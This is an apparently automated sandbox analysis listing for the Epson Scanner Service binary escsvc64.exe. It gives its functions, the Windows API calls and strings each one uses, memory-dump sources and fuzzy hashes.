
Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CommandLine$ArgvCtrlDispatcherErrorFreeLastLocalServiceStart
String ID: /INSTALL$/REMOVE$/START$EpsonScanSvc
API String ID: 3066385700-2890983393
Opcode ID: 892e3ca7ef4c69f471d0857e3ba10fac6c3007216d9c59a3f38b029a3d16826f
Instruction ID: 00e7215b831508a1bfd6c78f70e2d71afd0ea9bd53dfdf506a60f8cf801ecc08
Opcode Fuzzy Hash: 892e3ca7ef4c69f471d0857e3ba10fac6c3007216d9c59a3f38b029a3d16826f
Instruction Fuzzy Hash: BB4137B161460182FBA7DF26F8003D522A6B78DBD4F450115FB4D4B2B5EB7DC6858B00

Function 000000014000C460 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

ProgramFiles(x86), xrefs: 000000014000C46A

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: ProgramFiles(x86)
API String ID: 0-3631460872
Opcode ID: 5aa0113af64dece72855306ed5142673a163ac40d65c4e8cb90546828406792a
Instruction ID: 9127b6108a6fe4907f51ecd6b6fda9542d2f4e0bc3f7902fd2aa62e221dadbe8
Opcode Fuzzy Hash: 5aa0113af64dece72855306ed5142673a163ac40d65c4e8cb90546828406792a
Instruction Fuzzy Hash: AED1B0B2226B4046FB66DF23B940B9A22D5BB4CBD4F544628BF59877F5EF39C4508304

Function 0000000140001620 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 0000000140001646
OpenSCManagerW.ADVAPI32 ref: 0000000140001666
CreateServiceW.ADVAPI32 ref: 00000001400016C8
CloseServiceHandle.ADVAPI32 ref: 00000001400016D6
CloseServiceHandle.ADVAPI32 ref: 00000001400016DF

Strings

EpsonScanSvc, xrefs: 000000014000167D
Epson Scanner Service, xrefs: 0000000140001676

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$CloseHandle$CreateFileManagerModuleNameOpen
String ID: Epson Scanner Service$EpsonScanSvc
API String ID: 3731051440-3749567872
Opcode ID: e44dd253997b3ef5f0b967754aed42a884e41eef0cd5d29b8ab8123e2fea21ee
Instruction ID: d12736527c6ebb1e8ae89aa99a5e8e9019ee518063c7dab1828002a18af76718
Opcode Fuzzy Hash: e44dd253997b3ef5f0b967754aed42a884e41eef0cd5d29b8ab8123e2fea21ee
Instruction Fuzzy Hash: 08110D75219B8086EBA29F12F84439A73E0F78C784F440129AB8E4BB65DF7EC159CB04

Function 000000014000B7C0 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B82C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B83C
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B8AF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B918
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B9D0
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B9F3

Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1

LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000BA98
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000BB18

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: 20432cab36c6dbed515a262eca0b50abff2ace2c6339518cb4822e9a9266b7e2
Instruction ID: 9c8700ab1141e435e72936b5364478f7a3f5ef711e1f984da879f0f746b14839
Opcode Fuzzy Hash: 20432cab36c6dbed515a262eca0b50abff2ace2c6339518cb4822e9a9266b7e2
Instruction Fuzzy Hash: 97A17CB26046808AEB66DF27A8407AA77E5F74CBE8F444615FF69477F8DBB4C9008700

Function 000000014000BE40 Relevance: 12.3, APIs: 8, Instructions: 255COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BEB1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BEC7
CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BF65
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BFCD
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C074
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C0A1
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C144
CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C164

Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString$AllocErrorHeapLast
String ID:
API String ID: 2358816652-0
Opcode ID: e9b1fc539188ae227e023a621f6c880a74b02bd8cd22f073dc7325617dabf5e2
Instruction ID: 25766cdb4171dd0df19f2a8dc6186ae233e1c77f8feca8f3f56186a2c2c33a88
Opcode Fuzzy Hash: e9b1fc539188ae227e023a621f6c880a74b02bd8cd22f073dc7325617dabf5e2
Instruction Fuzzy Hash: 6CA18DB221068186EB66CF27A840BEA76E5F74CBE4F044325BF69477F5DB78C9108600

Function 0000000140002BE0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140004D93
RtlLookupFunctionEntry.KERNEL32 ref: 0000000140004DB2
RtlVirtualUnwind.KERNEL32 ref: 0000000140004DFE
IsDebuggerPresent.KERNEL32 ref: 0000000140004E70
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004E88
UnhandledExceptionFilter.KERNEL32 ref: 0000000140004E95
GetCurrentProcess.KERNEL32 ref: 0000000140004EAE
TerminateProcess.KERNEL32 ref: 0000000140004EBC

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: a993e17622dc4e08d11cadeb5874a037e5c983861ee5d26290c3c4bdfb062f94
Instruction ID: 0a53ef63b1186bbb18e64a066530ac40fa3c2432616e5a8d49a3086d2c49944c
Opcode Fuzzy Hash: a993e17622dc4e08d11cadeb5874a037e5c983861ee5d26290c3c4bdfb062f94
Instruction Fuzzy Hash: 6031B275105B8095EB529B66F84039A77A5F7887D4F90002AFB8D4BBB9DF7EC488C700

Function 00000001400024A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117sleepcomCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00000001400024A9

Part of subcall function 0000000140002300: OpenProcess.KERNEL32 ref: 00000001400023C7
Part of subcall function 0000000140002300: EnumProcessModules.PSAPI ref: 00000001400023E8
Part of subcall function 0000000140002300: GetModuleBaseNameW.PSAPI ref: 0000000140002407
Part of subcall function 0000000140002300: lstrcmpiW.KERNEL32 ref: 000000014000241F
Part of subcall function 0000000140002300: WaitForSingleObject.KERNEL32 ref: 0000000140002431
Part of subcall function 0000000140002300: CloseHandle.KERNEL32 ref: 0000000140002441

CoInitialize.OLE32 ref: 00000001400024C2
CoCreateInstance.OLE32 ref: 00000001400024FF
Sleep.KERNEL32 ref: 000000014000261A
CoUninitialize.OLE32 ref: 0000000140002646

Strings

EsDevApp.exe, xrefs: 00000001400024AF

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ProcessSleep$BaseCloseCreateEnumHandleInitializeInstanceModuleModulesNameObjectOpenSingleUninitializeWaitlstrcmpi
String ID: EsDevApp.exe
API String ID: 3981737800-2601315703
Opcode ID: daf108ad2492d59e3b2f479c2d6f66dd4c153266607f82eb38b2f9320bf23656
Instruction ID: 4c1571d9f6e7ad7ab6dcd9acc25b38c42de4195439161a2ccdbef4236d1c33e3
Opcode Fuzzy Hash: daf108ad2492d59e3b2f479c2d6f66dd4c153266607f82eb38b2f9320bf23656
Instruction Fuzzy Hash: FD51F872704B85C7EB41DF6AE48039AB7A4F788B84F544016EB8A87B78DF3AC404CB00

Function 0000000140004AE0 Relevance: 9.1, APIs: 6, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70

RtlCaptureContext.KERNEL32 ref: 0000000140004B46
IsDebuggerPresent.KERNEL32 ref: 0000000140004B8A
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004B94
UnhandledExceptionFilter.KERNEL32 ref: 0000000140004B9F
GetCurrentProcess.KERNEL32 ref: 0000000140004BB5
TerminateProcess.KERNEL32 ref: 0000000140004BC3

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminateValue
String ID:
API String ID: 2638224479-0
Opcode ID: fe3b404e39ab3a6359d64812ae7d5c32bbc6d9cca1fe9c7ac87858ea7d466bcd
Instruction ID: a5a9b1898e11e2f70964af4ed3ba5651a8fd56e4f95061c9445462abb668a243
Opcode Fuzzy Hash: fe3b404e39ab3a6359d64812ae7d5c32bbc6d9cca1fe9c7ac87858ea7d466bcd
Instruction Fuzzy Hash: C1214A71208B8096EB61DB52F84439AB3A4F79DBC4F844025FB8A47B69DF7DC504CB00

Function 0000000140004A40 Relevance: 9.0, APIs: 6, Instructions: 34COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140004A51
IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
TerminateProcess.KERNEL32 ref: 0000000140004ACE

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 749ad101a7401e2ef89ee7f69644ff702e9b097609237a3113f26607bece523b
Instruction ID: 547e43dbe8d46964c1980a3d338b47eb6a37bf82025ef3a4bc6307ca307c5f97
Opcode Fuzzy Hash: 749ad101a7401e2ef89ee7f69644ff702e9b097609237a3113f26607bece523b
Instruction Fuzzy Hash: 18010C71318A8196EB62DB62F88439A73A4FB9D785F400125BBCE47675EF7DC108CB14

Function 0000000140008860 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000889F
GetCurrentProcessId.KERNEL32 ref: 00000001400088AA
GetCurrentThreadId.KERNEL32 ref: 00000001400088B6
GetTickCount.KERNEL32 ref: 00000001400088C2
QueryPerformanceCounter.KERNEL32 ref: 00000001400088D3

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 3172a890c2690bad93ebacd8f31485773cebedccae4a3836e7c267b263b6fc39
Instruction ID: c8f5c1707d9d7f31180c01c804354bd43dcd32a39dbeb025c98923512ad50797
Opcode Fuzzy Hash: 3172a890c2690bad93ebacd8f31485773cebedccae4a3836e7c267b263b6fc39
Instruction Fuzzy Hash: 51015B31255A4086EB929F22F9443856360F74DBD1F846220FF9E4B7B4DA7DC8858700

Function 004514F8 Relevance: 5.1, APIs: 3, Instructions: 577COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 004517B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00451AD4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00451ADA

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 271df34881ef90a6752aab6aa872fdf107a8abbdb8059afa06a903151e2ecbe1
Instruction ID: d723985b6ed305354a95720fc10d28f095bdaecea1c04615a6b53f9ad632607c
Opcode Fuzzy Hash: 271df34881ef90a6752aab6aa872fdf107a8abbdb8059afa06a903151e2ecbe1
Instruction Fuzzy Hash: AA02CE30618A088FDB14EF28D8997AE77E1FB98315F14461EE84BC32A1DF78D945CB85

Function 00000001800015D0 Relevance: 5.1, APIs: 3, Instructions: 577COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180001889
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180001BAC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180001BB2

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 3294e3db836000f6d2449f15fb682ad65810c8515660842441d03c4222b8b57f
Instruction ID: 3e174ebd0b4dc535322bba8940045b5d3b3c6cc8a60d76115f1a3040dc0f23b8
Opcode Fuzzy Hash: 3294e3db836000f6d2449f15fb682ad65810c8515660842441d03c4222b8b57f
Instruction Fuzzy Hash: 0E027230618A0C8FEB95EF28D8897EE77E1FB9C355F108619F44AC31A1DF749A458B81

Function 000000014000E7D0 Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000014000E80F
SetUnhandledExceptionFilter.KERNEL32 ref: 000000014000E855
UnhandledExceptionFilter.KERNEL32 ref: 000000014000E860

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 2bd1da81d756f9debfc8ace423c26fb13e72461904f7d13b3772817e52c697b7
Instruction ID: f8d1cc87438c59eaa9310dd9af8894f5bfa89bfe72cd1caa951d1f775a9d3454
Opcode Fuzzy Hash: 2bd1da81d756f9debfc8ace423c26fb13e72461904f7d13b3772817e52c697b7
Instruction Fuzzy Hash: CC015A71219AC492F766DB26F4557EA63A0EB8D384F000129BB8E076F6DF3DC508CB01

Function 0000000140005390 Relevance: 3.3, APIs: 2, Instructions: 252COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140005280: GetOEMCP.KERNEL32 ref: 0000000140005320

IsValidCodePage.KERNEL32 ref: 0000000140005493
GetCPInfo.KERNEL32 ref: 00000001400054A8

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 746918d43814e1f2c9af94b4a9972c42ccf04353f898198fd0c53df7ebd173c8
Instruction ID: 18e61400bb96301bbec93746a76fb9060afdb4b0dd8a3b5c59150d0e33468df6
Opcode Fuzzy Hash: 746918d43814e1f2c9af94b4a9972c42ccf04353f898198fd0c53df7ebd173c8
Instruction Fuzzy Hash: 33A12BF3A0478086E756EF36E4143BE7BA1F70AB8AF98801AE7454B3A5DB39C544D710

Function 000000014000DCB0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000014000DEA2
GetLastError.KERNEL32 ref: 000000014000DECD

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: b65bf8a35cb6acb9d5dcae940683951546b7911799428669d5f49dfc0d45bba3
Instruction ID: 4df4f4bd984c48344e5120aa612abb9bb394b705a9150be4478bdb323d17f3df
Opcode Fuzzy Hash: b65bf8a35cb6acb9d5dcae940683951546b7911799428669d5f49dfc0d45bba3
Instruction Fuzzy Hash: D271C0B2605A8186F7A7EF16F5117EA73A0F7897D4F148126FF890B7A5DB388441C720

Function 000000014000EA40 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8b9bd707a4bded7346095c377bb72f702d82cdc3ba41d96247cdce7536106d
Instruction ID: a108be8453ac259458a964569c12a7956ece8339cf63da49095956afe38e5b46
Opcode Fuzzy Hash: 5f8b9bd707a4bded7346095c377bb72f702d82cdc3ba41d96247cdce7536106d
Instruction Fuzzy Hash: 6A31BDB261069042F727EF37B9957DF7691ABC97E0F254628BB26076F2CB78C4008714

Function 0000000140003FEC Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

, xrefs: 0000000140004594

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 32495c8dccd9f3046cba6630eed02d8ddada8e30325001f32572ff2cb2464c48
Instruction ID: 9b98e272f23b31000e522342938d738987bd4303e8b55c05a30ad8263886681a
Opcode Fuzzy Hash: 32495c8dccd9f3046cba6630eed02d8ddada8e30325001f32572ff2cb2464c48
Instruction Fuzzy Hash: 1CD103F290878486F762DF16B5043AE7AA0F74A7D4F204115FF95076EAEB7AC840DB48

Function 000000014000DF90 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000DFB8

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 9c474ab35380cca253cccae0723cdccddec738a87e399c508cee6c96ab130aff
Instruction ID: 6361ff8ef294167b234341539ef2ad75469b6cb2daf03c0979b493034d4b5b00
Opcode Fuzzy Hash: 9c474ab35380cca253cccae0723cdccddec738a87e399c508cee6c96ab130aff
Instruction Fuzzy Hash: A1F0FEB161858081FA62EB22E8623DA7791A79C7D9FC00615FB9D5B6B5DA7CC2058A00

Function 000000014000438B Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 81c1d04c05283fd2a1325daf2c7e4ba4b4c701fcda75abe4fb00a0c260c9d664
Instruction ID: 203bb844dbd7e1f4b5331dfdd11ea529bf7a11c02d688668fadee304e6c52705
Opcode Fuzzy Hash: 81c1d04c05283fd2a1325daf2c7e4ba4b4c701fcda75abe4fb00a0c260c9d664
